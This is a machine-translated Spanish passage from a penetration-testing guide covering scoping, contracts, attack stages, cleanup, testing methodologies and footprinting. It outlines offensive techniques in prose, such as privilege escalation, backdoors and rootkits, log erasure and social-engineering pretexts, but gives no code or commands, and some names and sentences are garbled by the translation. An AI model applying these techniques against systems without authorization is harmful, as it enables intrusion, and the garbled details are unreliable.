próxima semana más o menos.
Machine Translated by Google

También deberá identificar sus plazos, pero debe asegurarse de que sea el plazo que requiere
el cliente. No es lo que crees que es mejor, a menos que te estén pidiendo un consejo.

También desea asegurarse de desarrollar un plan de emergencia si se encuentra con una


situación en la que un atacante malicioso real se ha abierto camino.
¿Qué haces en esas situaciones?

Bueno, deberá asegurarse de que toda la información esté respaldada de forma segura antes
de comenzar a hacer cualquier cosa, porque algunas cosas que podría hacer podrían modificar
los archivos originales.

También deberá decidir el formato que utilizará para sus informes. ¿Se hace en un documento
estándar de Word? ¿Lo necesitan en PDF?
¿Qué información deben ver? ¿Debe mostrarse según quién esté mirando el informe?

Por ejemplo, tal vez el gerente del departamento de TI no quiera ver todos los detalles de lo
que sucedió. Solo necesita ver las cosas de las que debe encargarse y quién está involucrado
en la entrega del informe.

Hay que ser cauteloso aquí porque muchas veces al atacar el trabajo de un profesional de TI
y presentar el informe de una manera que es constructiva, en lugar de burlarse y es una forma
genuina.

El profesional de seguridad que entrega este informe debe ser consciente de que podría surgir
algo de odio, y le guste o no, siempre debe informar todo.

Para llevar un registro de todo esto, hay que empezar a hacer listas. Aquí hay algunas cosas
que puede incluir en su lista de verificación; el diseño de la red o las subredes, qué rangos
están usando, mire la seguridad física tanto de los servidores como de los dispositivos de red,
pero también del edificio en sí.

Por ejemplo, ¿puede alguien entrar en la oficina y encontrar un conector RJ45 vacío? Además,
no olvide, no solo con el diseño de la red, sino que asegúrese de aprender ambos; las
direcciones IP externas e internas.

Examine los dispositivos de red, como enrutadores, conmutadores, cortafuegos, puntos de


acceso inalámbrico, controladores de LAN inalámbrica. ¿Cuántas de esas máquinas tiene
cada uno? Incluya también dispositivos finales, como dispositivos host inalámbricos y
cableados, como computadoras portátiles y computadoras.
Machine Translated by Google

También incluiría impresoras y escáneres, cámaras de circuito cerrado de televisión,


mecanismos de seguridad para puertas de entrada, dispositivos para salas de reuniones como
proyectores e IPTV, teléfonos IP y teléfonos IP para conferencias, o incluso dispositivos móviles
como teléfonos móviles, tabletas o incluso dispositivos Apple o Relojes Android, cualquier cosa
que esté conectada a la red.

¿Necesitan un mapa de su presencia en Internet? Muéstreles lo que es accesible desde el


exterior y si estas máquinas están conectadas tanto externa como internamente, querrá las
direcciones en ambos lados de la lista. ¿Qué pasa con el sistema operativo en la red?

Si está realizando una prueba de penetración y tienen cinco o menos servidores, por ejemplo,
servidores Windows o Linux, ¿debería revisar más servidores y, de ser así, cuántos de cada
tipo?

También debe asegurarse de que puede identificarlos. ¿El cliente requiere una evaluación de
las redes inalámbricas o sus sistemas analógicos, así como de sus máquinas móviles,
especialmente si la organización implementa una fuerza de trabajo móvil?

¿Qué pasa con las aplicaciones y servicios web que ofrece el cliente? Si ese cliente tiene un
sitio web frontal, ¿tiene enlaces de redirección para visitar otros sitios o extraer contenido de
otras fuentes en su sitio?

Algunos ataques notables de malware y ransomware actualmente son causados por las redes
publicitarias. Estas son redes que proporcionan anuncios. Estas son redes publicitarias que
legitiman sitios, pero las personas simplemente se suscriben a ellos, y un atacante malicioso
crea un anuncio, y es solo HTML con una mezcla de JavaScript, que no es más que un espacio
de compra dentro de una red publicitaria.

Estas redes publicitarias son utilizadas por cientos de sitios web, y las personas no tienen idea
de que podrían estar ofreciendo códigos maliciosos cuando visita esos sitios.

Continuando, también querrá asegurarse de definir el alcance de la prueba de penetración.


Eso incluirá los entregables, es decir, cuál es la lista de informes que estarán disponibles
después de que haya completado la prueba.
También debe incluir las definiciones de datos o la forma que tomarán los resultados de la
prueba. También querrá definir la funcionalidad, la verificación de si el sistema funciona como
se esperaba y la estructura técnica que podría incluir diagramas de flujo para mostrar los
procesos y pasos por los que pasó.
Machine Translated by Google

Hay una cosa por la que quiere estar preocupado, y es algo que quiere explicarle al cliente. Si la
prueba de penetración demora un tiempo, durante ese período de tiempo, los cambios pueden
incorporarse a su red sin que los evaluadores de penetración lo sepan y, por lo general, el cliente
no comprende el impacto de esos cambios.

Antes de que se realicen modificaciones durante el período de tiempo de la prueba de


penetración, esto podría revisarse o enviarse al líder del compromiso de la empresa de prueba
de penetración para que pueda explicar los efectos de los cambios que están a punto de realizar.

Algunos de estos cambios incluyen cambios en los procesos comerciales o cambios técnicos,
como si la empresa cambia de ubicación. Además, si hay alguna aplicación que podría haber
cambiado. Aquí, no estoy hablando de actualizaciones de una aplicación existente, sino que me
refiero a cambiar a aplicaciones completamente diferentes.

Continuando, al considerar el alcance de la prueba de penetración, el equipo de prueba debe


considerar la seguridad del software del sistema, o la seguridad y la configuración.

También deberían estar analizando las vulnerabilidades basadas en el software y el sistema.


Desea ver la seguridad de la red, ver todos los diferentes componentes de la red y su
configuración. Por ejemplo, ¿hay valores predeterminados que todavía están en juego? También
tendrá que mirar la seguridad de la aplicación del lado del cliente.

El equipo de prueba debe verificar la seguridad y el cumplimiento de la aplicación del lado del
cliente, así como la seguridad del lado del cliente al lado del servidor, a medida que los datos se
transmiten del cliente al servidor.

¿Cómo se protege ese tráfico? Dado que ha realizado la verificación del tráfico del cliente al
servidor, también desea observar la seguridad del lado del servidor. Por lo tanto, mirará a ambos;
aplicaciones web y las propias aplicaciones que se ejecutan en busca de fallas.

En el ámbito, tendrá que implementar métodos de ingeniería social para tratar de ver si también
puede recopilar algunas contraseñas o detalles del proyecto. El alcance también debe incluir la
documentación de la seguridad existente.

Además, ¿quiere pensar de qué manera los empleados destruyen los documentos que ya no se
usan? Una cosa que debe enfatizar es el uso de dispositivos de trituración.
Machine Translated by Google

También deberá evaluar la seguridad de la comunicación de la aplicación en busca de


intercepciones no autorizadas. Dentro del alcance, también deberá considerar la
seguridad física, porque la organización debe restringir el acceso físico solo a los
departamentos que son relevantes para el uso de esos sistemas.

Muchas empresas contratan empresas de trituración para que atiendan en el sitio y


eliminen sus documentos, pero la información aún sale a través de la basura normal, por
lo que debe asegurarse de que entiendan que este es uno de los vectores que se pueden
usar en su contra.

También debe verificar si hay empleados insatisfechos que puedan divulgar datos
confidenciales o llevárselos a un competidor. Una de las otras grandes cosas que puede
revisar con el cliente es sabotear la confusión del intruso.

Muchas veces, las empresas implementarán estrategias como un tarro de miel para
confundir o incluso engañar a los intrusos. Terminan gastando su tiempo pensando que
ese tarro de miel en particular es genuino.

Como probador de penetración, desea asegurarse de probarlos si los tienen en su lugar.


También desea probar dentro del alcance de la respuesta. Por ejemplo cuál es la
respuesta adecuada para cada tipo de incidente.

A continuación, hay que mirar los contratos. Aquí, desea asegurarse de que sus
documentos incluirán su acuerdo de no divulgación. Esto es para asegurar que protege
la información de la empresa.

También debes tener claro los honorarios y los plazos, sobre todo si el proyecto va más
allá del plazo estimado porque podrías encontrarte con algo que no estaba previsto.

También tendrás que tener un documento de información sensible. Esto incluye


información relacionada con los activos electrónicos de la empresa, las aplicaciones que
están actualmente en desarrollo o cualquier cosa de naturaleza delicada que requiera el
equipo de pruebas de penetración.

También debe incluir un contrato de información confidencial. Aquí será donde incluya
información comercial secreta, información de la red, información del sistema telefónico,
datos del cliente u otros materiales comerciales.

Este tipo de información se proporciona al pen-tester, y esta es otra razón por la que
mencioné anteriormente que recomiendo que la empresa le proporcione una computadora
portátil que sea de su propiedad, para que no tengan que preocuparse de que usted tome
Machine Translated by Google

fuera con parte de su información confidencial.

El contrato también debe mencionar que no revelará ni dará copias a ningún tercero o competidor.
Esto ayuda a establecer un nivel de confianza entre usted y la empresa porque está a punto de
atacarlos y ver si puede robar información.

El siguiente elemento de la lista es la cláusula de indemnización. Esto protege al pen tester de


cualquier responsabilidad legal o financiera. A veces sucede que la prueba de penetración da
como resultado alguna pérdida o daño a los activos de la empresa.

También debe tener en la sección de informes y responsabilidades de su contrato.


Esta debe ser una guía que establezca la metodología para realizar la prueba y cómo informará
esos procedimientos.

El siguiente elemento en su fase previa al ataque es la recopilación de información. Esto podría


hacerse de diferentes maneras. Por ejemplo, puede utilizar su reconocimiento pasivo, mirando
registros públicos.

Podría estar haciendo un poco de Google sobre la empresa o cualquier cosa que no sea
demasiado agresiva. O bien, también podría hacer lo contrario mediante una vigilancia activa
agresiva.

También debe hacer algunos perfiles web. La creación de perfiles web significa que puede
obtener una estructura de directorio de los servidores web o servidores FTP, y catalogar todos
los formularios basados en web, los tipos de entrada de usuario que se permiten y los destinos
de envío de formularios.

Pero también debe catalogar los mensajes de error que aparecen porque eso puede ayudar a
identificar enlaces y aplicaciones de terceros. Como ves la lista es larga y pasas mucho tiempo
en esta etapa en particular y eso es porque esto es lo que ayuda a cubrir ambas; usted mismo y
el cliente, por lo que hay un nivel de expectativa que debe cumplirse.
Machine Translated by Google

Capítulo 6 Pruebas de penetración @ Etapa 2

Pen testing La etapa 2 es la etapa de ataque. Toda la información que recopila durante la etapa previa
al ataque lo ayuda a idear una estrategia de ataque completa.
La etapa de ataque implica comprometer el objetivo.

Puede intentar explotar una vulnerabilidad que descubrió durante la etapa previa al ataque o incluso
utilizar algunas lagunas como políticas de seguridad débiles o políticas de contraseña para intentar
obtener acceso al sistema.

Es importante tener en cuenta que el atacante solo debe preocuparse por un puerto de entrada o un
mecanismo para ingresar, por lo tanto, el cliente o la empresa deben preocuparse por cubrir todas sus
bases.

En lugar de ser pasivo, necesitas volverte activo. Una vez que finalice el contrato y tenga permiso
para participar, primero debe intentar penetrar el perímetro observando las máquinas que están
expuestas externamente y cómo reaccionan.

Luego, debe ver cómo enumerar esos objetivos después de haber ingresado. En caso de que sepa
cuál es el objetivo, será más fácil tratar de alcanzar el objetivo.

Después de alcanzar el objetivo, lo siguiente que debe hacer es poder escalar sus privilegios, para
que pueda hacer más con ese sistema en particular. Finalmente, deberá asegurarse de poder volver
al sistema ejecutando, implantando y retractando, utilizando rootkits.

Entremos en detalles sobre cómo harías cada uno de estos elementos. La forma principal de probar
el perímetro es ir tras el propio cortafuegos, y lo hará enviando y elaborando algunos paquetes para
comprobar cómo reacciona el cortafuegos.

Esto se puede hacer observando cómo el cortafuegos maneja la fragmentación, los fragmentos
superpuestos, las inundaciones de paquetes.

También puede hacer esto creando algunos paquetes para que pueda verificar las Listas de acceso o
ACL del firewall, como lo que está permitido y lo que no.

Técnicamente, lo que está permitido y lo que está prohibido. También debería echar un vistazo a
cómo se filtran los protocolos intentando conectarse a varios protocolos, como SSH, FTP o incluso
Telnet.
Machine Translated by Google

También debe intentar medir los umbrales para diferentes ataques de denegación de servicio
al intentar enviar conexiones TCP persistentes y ver cómo lo maneja el firewall, o incluso
intentar transmitir conexiones UDP.

Al hacer esto, aprenderá cuáles son los umbrales establecidos en el firewall. También debe
intentar enviar algunas URL con formato incorrecto para ver cómo responde el IDS.

También puede intentar ver cómo responden los servicios web a algunas solicitudes, como
publicar solicitudes, eliminar solicitudes o copiar solicitudes. A continuación, debe ir después
de enumerar las máquinas.

El objetivo de enumerar máquinas es encontrar la mayor cantidad de información posible


sobre el host. Es posible que haya descubierto algo durante el entorno de prueba previa,
pero la fase de ataque lo activa.

Pero algunos de esos perímetros que descubrirá podrían ser cosas como: cuál es la
identificación de la máquina o cuál es la descripción de la máquina, y esto lo ayudará a
identificar dónde se encuentran físicamente las máquinas.

También deberá hacer un inventario de la accesibilidad de la red de estas máquinas.


Después de enumerar las máquinas, el siguiente paso es adquirir el objetivo.

Esto se debe a que conoce todo en la red o al menos una parte decente. Según lo que haya
descubierto, puede ir tras esas vulnerabilidades.

Algunas formas en que puede obtener más información sobre el objetivo es realizar ataques
de sondeo. Lo que esto significa es que apuntará a las máquinas que descubrió con
diferentes tipos de ataques para ver cuáles son vulnerables.

Por lo tanto, debe ejecutar análisis de vulnerabilidades. También debe adquirir el objetivo
haciendo algo básico como usar lo que se conoce como sistemas confiables.

Esto implica intentar acceder a los recursos del dispositivo a través de la información que ha
obtenido de forma legítima a través de ataques de ingeniería social.

Una vez que haya adquirido el objetivo, su siguiente paso es escalar los privilegios.
A veces, esta escalada es realizada por el atacante, por lo que para lograr esto, usted,
como evaluador de penetración, debe intentar aprovechar los errores y fallas en el diseño
del sistema operativo o las aplicaciones.

Tal vez incluso configuraciones incorrectas en un sistema operativo, o intentar elevar el


acceso a una aplicación de un usuario normal a alguien con permisos más altos.
Machine Translated by Google

Los atacantes normalmente realizan la escalada de privilegios para llevar a cabo diferentes
tipos de actividades, como eliminar archivos, buscar información confidencial o instalar
programas que pueden ayudarlos a volver a entrar más tarde, como un troyano o un virus.

Estos técnicamente llamados puertas traseras. Algunas formas en que puede escalar sus
privilegios incluyen políticas de seguridad deficientes o aprovechar los correos electrónicos
o la codificación del sitio web que no se ha probado para ver si puede recopilar la
información que podría conducir a una escalada de privilegios.

También puedes hacerlo mediante un ataque de fuerza bruta. La fuerza bruta consume
más tiempo y existen numerosas herramientas, como descifradores de contraseñas,
troyanos o incluso ingeniería social.

La ingeniería social es una de las formas más fáciles y preferidas para que los atacantes
ingresen porque es difícil de rastrear. Después de escalar los privilegios de una cuenta, lo
siguiente que debe hacer es intentar ejecutar, implementar y
retraer.

Algunos sistemas son vulnerables a ataques de denegación de servicio o desbordamientos


de búfer, y algunos virus antiguos como rootkits, troyanos y malware. Si puede establecer
un rootkit o un troyano que pueda permitir el acceso a más información o más recursos del
sistema, debe ver si puede cubrir sus huellas borrando los archivos de registro u ocultando
las modificaciones que haya realizado.

Usted, como pen-tester, también debe asegurarse de que puede cambiar la configuración
del sistema y permanecer oculto. Así que quieres ver si eres capaz de ser detectado
O no.

Una vez que haya hecho todo eso, debe asegurarse de que puede volver a ingresar a
través de su puerta trasera y ver si hay alertas, como alertas por correo electrónico, que
los ingenieros podrían haber recibido o advertido.
Machine Translated by Google

Capítulo 7 Pruebas de penetración @ Etapa 3

Si crees que los pasos previos al ataque o los pasos reales del ataque son los más
importantes, técnicamente eso no es cierto. Los pasos más críticos están en la etapa
posterior al ataque porque lo estás haciendo desde un punto de vista ofensivo.

Es responsabilidad del pen-tester limpiar su desorden. Tendrá que asegurarse de devolver


los sistemas a su estado previo a la prueba.

No solo haces un lío y te vas. Por lo tanto, debe eliminar cualquier archivo que haya subido,
cualquier dato en el que realice modificaciones; se asegurará de restaurarlos, así como
cualquier configuración que haya cambiado.

Esta es también una de las razones por las que es vital documentar cada paso del camino.
También debe deshacer cualquier privilegio o configuración de usuario si ha realizado una
escalada de privilegios.

También debe asegurarse de restaurar la red en la que ha realizado cambios, ya sea


dentro de DNS o en cualquier dirección IP. En resumen, debe volver a crear el mismo
estado de red que tenía antes de entrar.

Si ha ingresado al registro de alguna manera en cualquier sistema, debe asegurarse de


devolverlos también a su misma configuración.

A veces, incluso puede crear diferentes recursos compartidos y conexiones, por lo que
debe deshacerlos, y también deberá asegurarse de documentar todos los registros que se
capturaron, así como las entradas que se modificaron.

Después de eso, tendrás que analizar los resultados y, en lugar de crear problemas, debes
desarrollar soluciones. Una vez que haya hecho todo eso, debe presentar esa
documentación a su cliente, mientras que debe identificar el sistema crítico y los recursos
críticos que están en riesgo, y elaborar una lista priorizada de lo que debe modificarse
primero.
Machine Translated by Google

Capítulo 8 Estándares de prueba de penetración

Las diferentes formas en que realiza las pruebas de penetración dependerán de la metodología que
decida utilizar. Hay muchos estándares por ahí. Vamos a cubrir algunos de ellos, para que pueda
saber cuál se adapta mejor a usted.

Comencemos primero con OSSTMM, que significa Manual de metodología de prueba de seguridad de
código abierto. Este conjunto estándar de pruebas de penetración está tratando de lograr una matriz
de alta seguridad.

En resumen, se considera que este es el estándar para algunos de los niveles más altos de prueba.
Hay otro llamado OWASP, que significa Open Web Application Security Project.

OWASP es una metodología de código abierto, incluye numerosas herramientas que pueden ayudarlo
mucho, y también tiene una base de conocimiento, así como una herramienta que se llama ZAPP o
Zed Attack Proxy Project.

ZAPP es una herramienta que puede ayudarte automáticamente a encontrar vulnerabilidades en las
aplicaciones web. ZAPP está diseñado para desarrolladores web, pero los pen-testers también pueden
usar esta herramienta.

También hay otro marco llamado ISSAF, que es el marco de evaluación de la seguridad del sistema
de información. ISSAF también es un proyecto de código abierto sobre cómo realizar una prueba de
penetración. La ISSAF cuenta con el apoyo de un grupo denominado grupo de seguridad del sistema
de información pública.

Otro estándar que debe mirar se llama NIST, que significa Instituto Nacional de Estándares y
Tecnología. Cuando se trata de NIST, debe saber que la agencia federal de tecnología trabaja con la
industria para desarrollar y aplicar tecnologías, medidas y estándares.

También tenemos LPT, que significa Probador de penetración de licencias del EC-Council. Esta es una
metodología propietaria, y hay otra de McAfee, que se llama Foundstone y también tiene ISS, que la
hace IBM.

Cuando se trata de IBM, ellos hacen las pruebas por usted. También tenían un producto basado en la
firma llamado Proventia, que ahora está descontinuado. Este era un dispositivo de seguridad
multifunción y ofrecía numerosos servicios diferentes para ayudar a asegurar o probar su entorno de
red.
Machine Translated by Google

Lo mismo ocurre con McAfee y Foundstone también. Es técnicamente propiedad de Intel.


Con EC-Council's LPT requiere que el examinador pase por numerosos pasos diferentes,
similar al CEH.

Debe realizar un curso, pasar por un proceso de solicitud, que incluye una tarifa de $ 900, y
le brindarán acceso al entorno Aspen de EC-Council.

Realizan una prueba de penetración en un entorno de prueba y tienen 30 días para enviar su
informe al Consejo de la CE. Con cada uno de estos, ya sea el código abierto o las versiones
propietarias de estas metodologías, todos ellos son similares entre sí.

Cada uno de los métodos te ayudará a cubrir todas tus bases. Todos comienzan con una
etapa de recopilación de información, de la que hemos hablado anteriormente.

Se trata de salir y encontrar la mayor cantidad de información posible sobre el objetivo o la


empresa, ya sea de fuentes públicas, periódicos, artículos de Internet, blogs o fuentes de
datos de terceros.

Luego, debe pasar por una prueba de penetración externa y está buscando vulnerabilidades
a las que se pueda acceder desde el exterior. A continuación, vería un análisis de
vulnerabilidad para poder encontrar puntos débiles basados en software, sistemas operativos
o máquinas.

Después de eso, haría una prueba de penetración de la red interna para ver qué tipo de
información está expuesta desde adentro. Luego pasa por la prueba abierta del firewall.

Esta es su principal línea de defensa del mundo exterior, pero también haría pruebas desde
la DMZ. Como nota al margen, DMZ significa Zona desmilitarizada, a veces denominada red
perimetral o subred filtrada.

A continuación, debe verificar que el IDS esté haciendo lo que se supone que debe hacer,
que detecta intrusiones. Como pen-tester, buscará si alguna vulnerabilidad le permitiría al
atacante eludir la configuración de las alarmas que están configuradas en estos sistemas.

Luego, los métodos de descifrado de contraseñas se pueden usar para identificar las
debilidades asociadas con la administración de contraseñas. Esto le ayuda a asegurarse de
que no es propenso a ataques de fuerza bruta, ataques híbridos o ataques de diccionario.
Machine Translated by Google

Estas metodologías también aseguran que cubra las pruebas de penetración de


ingeniería social. Este tipo de experimentos se pueden realizar utilizando métodos
humanos o ingeniería social con computadoras, haciendo que alguien abra un archivo
adjunto de correo electrónico.

También tendrá que cubrirse mirando las pruebas de penetración de aplicaciones web.
Vas a estar buscando vulnerabilidades relacionadas con el código o de back-end.
Lo más probable es que algunas pruebas más famosas incluyan la prueba de penetración de SQL.

La inyección de SQL sigue siendo dominante hoy en día. Aprovecha las variables de
entrada no validadas que se transmiten mediante comandos SQL a través de la
aplicación web que se ejecuta en la base de datos de back-end.
Dependiendo de dónde coloque sus enrutadores dentro de su red y conmutadores,
reenvían paquetes de datos de un punto a otro, a veces dentro y otras veces fuera de
su sistema.

Si desconecta un enrutador, termina eliminando a todos los que están conectados a


Internet. Cuando está probando enrutadores, normalmente puede hacerlo desde
Internet, así como desde el interior.

También tendrás que fijarte en la red inalámbrica. Aquí, se centrará en la disponibilidad


de redes inalámbricas externas a las que pueden acceder los empleados de la empresa.

Esto técnicamente elude el cortafuegos de la empresa, porque la conexión inalámbrica


no se puede restringir y sale por todas partes en el aire, y no la vemos, y se puede
acceder a la señal desde fuera de los límites físicos de la ubicación de la empresa.

También observará la solidez del cifrado y el tipo de cifrado que se implementa.


También continuarás cubriendo tus bases con estas metodologías haciendo pruebas
de denegación de servicio.
Vea si puede desmantelar la red empresarial o un sitio de comercio electrónico
inundándolo con paquetes o con tanto tráfico que ya no sepa qué hacer. Cuando
realiza un ataque de denegación de servicio, lo que está buscando es el umbral en el
que el sistema comienza a fallar.
Debería pensar en cómo manejaría las máquinas robadas. Por ejemplo, una vez que
haya bloqueado todos sus teléfonos y computadoras portátiles, también debe pensar
en lo que sucede cuando esas máquinas son robadas.
Machine Translated by Google

Por ejemplo, el equipo de pruebas de penetración puede intentar tomar equipos móviles y
realizar pruebas fuera de línea para obtener acceso a la información almacenada en esas
máquinas fuera de línea.

Por ejemplo, no debe ir tras la computadora de alguien en el departamento de ventas, en su


lugar, intente enfocar su ataque hacia alguien que haya identificado como una persona de TI.

Si puede conseguir a alguien del departamento de TI o alguien de la alta gerencia, bueno, esas
personas tienen más permisos o acceso a más sistemas que el resto de los empleados.

También debe mirar las pruebas de penetración del código fuente. En la actualidad, muchas
empresas utilizan aplicaciones creadas internamente y, a veces, estas aplicaciones ni siquiera
se consideran parte de la plataforma de seguridad.

Como pen-tester, verá el código fuente manualmente o existen numerosas herramientas que
podrían ayudarlo, como Zappit.

En este tipo de prueba, el equipo de prueba intentará obtener acceso a las instalaciones antes,
durante y después del horario comercial, pero no debe hacer nada destructivo.

Por ejemplo, usted no rompe las ventanas, pero si puede forzar la cerradura con facilidad, o
puede desarmar la puerta o saltar los torniquetes, está bien para muchas compañías.

Algunas empresas tienen un poco de miedo de que se realice ese tipo de prueba, por lo que
otra cosa que debe hacer es realizar recorridos para brindar a la empresa una perspectiva
objetiva de los controles de seguridad que existen actualmente y cómo se pueden eludir.

Del mismo modo, verifique si la empresa tiene cámaras. Si es así, desea saber si funcionan con
una interfaz web. ¿Cuál es su ángulo de visión? Por ejemplo, puede utilizar un dron para volar a
un área para mirar la parte superior de la cámara y mirar detrás de la cámara sin ser detectado.

En resumen, puede ver cuánto movimiento se permite antes de que la cámara se active o dónde
está la visibilidad de la cámara. También deberá asegurarse de consultar las bases de datos.

Aquí es donde intentará acceder directamente a los datos contenidos en la base de datos al
intentar utilizar algunos métodos de descifrado de contraseñas. Tú podrías
Machine Translated by Google

también intente hacer su ataque de inyección SQL estándar, pero no bases de datos basadas en
SQL.

También tendrá que mirar la fuga de datos. Aquí, debe comprender si los datos que descubre
contienen propiedad intelectual, datos privados o confidenciales.

Esta prueba de penetración en particular debe tratar de ayudar a la empresa a evitar que la
información confidencial salga al mercado o a los competidores. Por lo tanto, debe verificar quién
tiene acceso a esos archivos.

También debe tratar de mejorar la conciencia entre los empleados sobre las mejores prácticas.
Esto es más específico, pero si la empresa usa una plataforma SAPP, puede implementar una
prueba de penetración para ver si se ha parcheado correctamente.

Esto es, para que pueda averiguar si hay alguna vulnerabilidad que un atacante podría utilizar, ya
que SAPP contiene mucha información crítica para el negocio.
Otra área a tener en cuenta cuando realiza una prueba de penetración es la prueba de penetración
VPN o Virtual Private Network.

La mayoría de las empresas permiten que algunos de sus empleados trabajen de forma remota,
ya sea que estén de viaje o trabajando desde casa. En cualquier caso, las VPN crean una
conexión confiable a la red interna.

Sabe que el pen-tester intentará obtener acceso a la VPN al intentar comprometer un punto final
remoto o al intentar obtener acceso al túnel VPN, para que puedan acceder a la red.

Además, también deberías intentar acceder a la red de VoIP o Voz sobre IP para intentar grabar
conversaciones o hacer una denegación de servicio para que no puedan comunicarse.

Otra característica popular es la nube, por lo que cuando comienza a usarla, la seguridad se basa
en la responsabilidad compartida tanto del proveedor como del cliente, y existen muchos riesgos
de seguridad asociados con la computación en la nube.

Otras pruebas que debe realizar incluyen dispositivos virtuales. La mayoría de las empresas ya
utilizan la virtualización. El hecho de que el dispositivo host esté completamente parcheado no
significa que la máquina virtual o la máquina virtual lo estén.

Lo que podría encontrar es que el dispositivo virtual está parcheado, pero el host no, y debido a
que el entorno virtual es una duplicación exacta del entorno físico, sufre los mismos problemas de
seguridad.

Si la máquina virtual está ejecutando software o aplicaciones, entonces es vulnerable. los


Machine Translated by Google

al atacante no le importa si es virtual o no. Es solo otro objetivo.

Cuando realiza este tipo de pruebas, busca ver si es capaz de superar una tecnología más
antigua que una empresa puede haber olvidado.

Debe ver si hay módems antiguos que aún tengan sus contraseñas predeterminadas. Los
módems se identifican mediante un banner.

Ya sea un troyano, un virus o un ransomware, pero, por ejemplo, troyanos diseñados para
robar información confidencial, eliminar datos, reemplazar archivos del sistema operativo, tal
vez incluso realizar un ataque de denegación de servicio, comenzar a observarlo con
registradores de teclas, crear puertas traseras o proporcionar acceso remoto. acceso.

Los virus están diseñados para destruir datos, ralentizar los sistemas, consumir recursos y
también tiene el problema con el ransomware. Como probador de penetración, debe asegurarse
de buscar cualquier puerto que pueda ser sospechoso y que esté abierto.

Además, debe buscar cualquier proceso o entrada de registro, o controladores de máquinas


que estén infectados, servicios de Windows o servicios falsos, qué programas tienen acceso a
la red, cómo los usuarios o empleados manejan el malware o el ransomware que llega a través
del correo electrónico, etc. .

Otra cosa que debe tener en cuenta cuando realiza la prueba de penetración es la administración
de registros. Los archivos de registro registran quién, qué, dónde, cuándo, de todo en la red,
por lo que se administran esos archivos de registro, se aseguran de que se colocan en
ubicaciones que estén debidamente protegidas o se monitorean para detectar cualquier
modificación.

Una vez que es demasiado tarde, también debe probar la integridad de sus archivos. ¿Cómo
están manejando eso? Aquí, debe asegurarse de que no se alteren los archivos, especialmente
cuando se trata de archivos del sistema operativo.

Eso también está relacionado con el malware, pero debe intentar identificar quién modificó los
datos, cuáles son los atributos y cómo se registran y mantienen.

Cuando se trata de dispositivos móviles, bueno, hoy en día todo el mundo tiene dispositivos
móviles. Todo el mundo quiere estar en el móvil, y las implementaciones de BYOD o Traiga su
propio dispositivo se están volviendo muy populares, por lo que debe comenzar a monitorear y
verificar los dispositivos móviles de las personas.

Porque estas máquinas portátiles funcionan con diferentes Sistemas Operativos


Machine Translated by Google

y diferentes aplicaciones, presenta nuevos problemas de seguridad para todos nosotros.

Técnicamente, debería haber una persona monitoreando los dispositivos móviles en todo momento.
Hablamos de VoIP, pero también tenemos pruebas de penetración de banda ancha y
telecomunicaciones.

No importa qué negocio en qué edificio esté mirando; puede recopilar los datos de todos. Una de
las formas más importantes en que las personas ingresan al sistema es mediante el uso de malware
y ransomware a través del correo electrónico, por lo que también debería considerar la seguridad
del correo electrónico.

El correo electrónico es la comunicación más utilizada en el mundo de hoy. Pero la razón principal
por la que es importante es porque usamos el correo electrónico para almacenar información
personal y datos corporativos con archivos adjuntos.

Por ejemplo, si puede obtener la cuenta de los CIO o CTO, podría tener un impacto significativo en
la empresa. Por lo tanto, la seguridad del correo electrónico debe analizarse tanto interna como
externamente.
Machine Translated by Google

Capítulo 9 Introducción a Footprinting

Cuando se trata de pruebas de penetración y huella del objetivo, el propósito es


determinar qué información está disponible públicamente sobre su objetivo. Se trata de
información que está disponible en Internet, como la arquitectura de la red, los sistemas
operativos, las aplicaciones o los usuarios.

Esto es pasivo en lo que respecta a la investigación. Usted, como pentester, debe intentar
cualquier forma posible de buscar hosts o redes.

Podría ser cualquiera de ellos, pero debe usar cualquier forma posible para recopilar la
mayor cantidad de información posible antes de pasar a la siguiente etapa de la prueba
de penetración.

Si encuentra información confidencial en cualquier sitio web o ubicación que esté


disponible públicamente, esa información debe informarse a la organización en su informe.

Si encuentra información que cree que es crítica y cree que no debe esperar un mes o
incluso una semana antes de enviar el informe completo, debe notificar a su contacto de
emergencia de inmediato.

Esta etapa del ataque debería ayudar a prevenir la fuga de información y ayudarlo con
los intentos de ingeniería social. Veamos los detalles.

Lo primero que puede hacer es obtener la autorización adecuada, y será de quien esté a
cargo. Puede o no incluir administradores del sistema.

Muchas veces las empresas deben saber cómo se están desempeñando sus administradores de sistemas.
Después de pasar por ese proceso, debe asegurarse de definir el alcance.

Limitar el alcance de la prueba de penetración es un requisito previo. Pasar por esta


etapa lo ayuda a configurar la lista de elementos que deben probarse. Por ejemplo;
cuáles son los rangos de IP o rangos de subred de los sistemas, o cuáles son sus limitaciones.

Una vez que haya definido el alcance, debe planificar y recopilar información sobre ese
alcance utilizando sus herramientas de reconocimiento. Debe comenzar con los motores
de búsqueda como Google, Bing o Yahoo, cualquiera que deba usar para ver qué
información está expuesta actualmente.

También puede consultar otros sitios específicos, como sitios de redes sociales como
Facebook, y ver si hay una página de Facebook o una cuenta de Twitter para la empresa.
Machine Translated by Google

A continuación, debe ver quiénes son amigos de esa empresa porque allí es donde encontrará
empleados existentes y verá si puede retroceder desde allí.

Una vez que haya terminado de buscar en los motores de búsqueda, debe intentar ver si puede
"hackearlos con Google". Puede hacerlo utilizando herramientas adicionales que le brindan una
interfaz gráfica de usuario, como SiteDigger o la base de datos de piratería de Google.

Al piratear Google, le permitirá encontrar recursos que han sido rastreados por el motor de
búsqueda de Google que las empresas pueden no saber que están incluidos allí, como
impresoras o cámaras, lo que podría brindarle una idea de las direcciones IP que están
expuestas, o que maquina tienen.

Tu próximo paso después del hackeo de Google es ir tras las redes sociales, como Facebook,
Twitter o LinkedIn.

La gente tiene una tendencia a nivel de redes sociales a bajar la guardia. Es fácil no ver de qué
está hablando la gente, pero las conversaciones iniciales con los usuarios o los empleados
pueden ser una excelente manera de recopilar información.

Puede iniciar una conversación con un empleado existente y decirle: “Hola, parece que tiene una
excelente empresa y he estado pensando en unirme al equipo de TI. ¿Qué tipo de dispositivos
usas allí?

Su próximo paso es ir y rastrear los sitios web, y lo hará con BlackWidow o Web Site Copier. Con
esta herramienta, primero debe descargar su sitio web para poder verlo sin conexión y ver el
código.

Debe recordar que todo lo que se le presenta en una interfaz web son archivos que se descargan
en su sistema. Por lo tanto, ¿por qué no descargar una copia exacta de ese sitio web para que
pueda ver lo que están haciendo en el back-end, especialmente si están haciendo llamadas
desde el front-end al back-end?

A continuación, puede comenzar a investigar algunas huellas de correo electrónico. Puede usar
algunas herramientas excelentes que lo harán por usted, como el comando "nslookup" para
averiguar los nombres DNS y las direcciones IP de sus servidores.

Parte de la información que puede obtener de los correos electrónicos incluye la


